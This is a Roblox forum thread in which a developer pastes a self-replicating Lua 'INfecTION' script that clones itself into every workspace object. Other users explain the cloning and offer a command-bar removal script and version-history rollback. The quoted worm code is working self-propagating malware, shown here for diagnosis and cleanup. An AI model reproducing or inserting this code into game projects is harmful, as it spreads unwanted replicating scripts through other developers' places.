|
Hi, I keep on getting this on every place.
it is a rotate, but when I delete it, guess what happened:
It reappers.
I even took a plugin AND a script to fix it.
Or free model.
Anyways, theres a script named:
Script......Or is it...
And some is spelled like:
INfecTION
Or spelled
infection
heres what the script is:
if script.Parent.className ~= "RotateP" then
local p = Instance.new("RotateP")
p.Parent = workspace
p.Name = "INfecTION"
script.Parent = p
end
function check()
local list = workspace:GetChildren()
for i = 1, #list do
if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
script.Parent:Clone().Parent = list[i]
end
wait()
end
end
while true do
check()
if workspace:findFirstChild("inFECtion") == nil then
local main = script.Parent:Clone()
main.Name = "inFECtion"
main.Parent = workspace
end
wait(3)
end
Its just multiplying, right?
Or is there a hidden script behind this.
Oh, and I heard that it might be this plugin:
http://web.roblox.com/Roblox-Best-Infection-Scanner-Even-Better-item?id=142269379
Im currently uninstalling it.
THANKS FOR READING!
And please get help ASAP
Or if you know how to fix, PLEASE TELL ASAP! |
|
|
Oh, I forgot, I didn't use Free models |
|
|
|
If the part is deleted, it will clone itself. Nil= not existed. I suggest taking out the script.
"Do you even grammar" |
|
CryptDevJoin Date: 2013-04-01 Post Count: 5273 |
Actully, the same thing is happening with my admin script. I have no idea...
Do u even egg? |
|
|
I deleted it, then it pops up. |
|
|
VritixJoin Date: 2011-01-01 Post Count: 2790 |
Put this into the command bar under your studio screen :
GetAll = function(ObjectTable)
local All = {}
ScanItem = function(Table, Item)
for Index, Object in pairs (Item:GetChildren()) do
table.insert(Table, Object)
ScanItem(All, Object)
end
end
for Index, Object in pairs (ObjectTable) do
table.insert(All, Object)
ScanItem(All, Object)
end
return All
end
local Q = {}
for _, a in pairs (GetAll(Game:GetChildren())) do
if a:IsA("RotateP") then
table.insert(Q, a)
end
end
for _, v in pairs (Q) do
pcall(function()
for _, j in pairs (v:GetChildren()) do
pcall(function()
j.Disabled = true
j.Source = ""
end)
end
v:Destroy()
end)
end |
|
|
|
|
Delete the script
I called Pizza Hut and asked for the numbers to Domino's. |
|
|
Hello, i got a report from someone else, that says my plugin does something.
But there's nothing wrong in my scripts.
My plugin does remove infections, and should remove the one your listing in here.
If it doesn't you need to check if your plugins are updated.
This is how you check it.
1. Open studio.
2. Hit "Plugins".
3. Then hit "Manage Plugins"
4. Then hit "update" on the right side, over the active plugins.
Got any future questions.
Just Pm me. |
|
|
Help me i have that rn ://// can someone tell me name of that model i got really confused and i don't know how to delete it like.. |
|
|
It is an infected script. You should insert a vaccine script or revert to an older version of your game (You can do that in Configure This Game>Version History. Problem should be solved! |
|
gh0stbitJoin Date: 2017-01-01 Post Count: 50 |
just dont be a noob and this wont happen |
|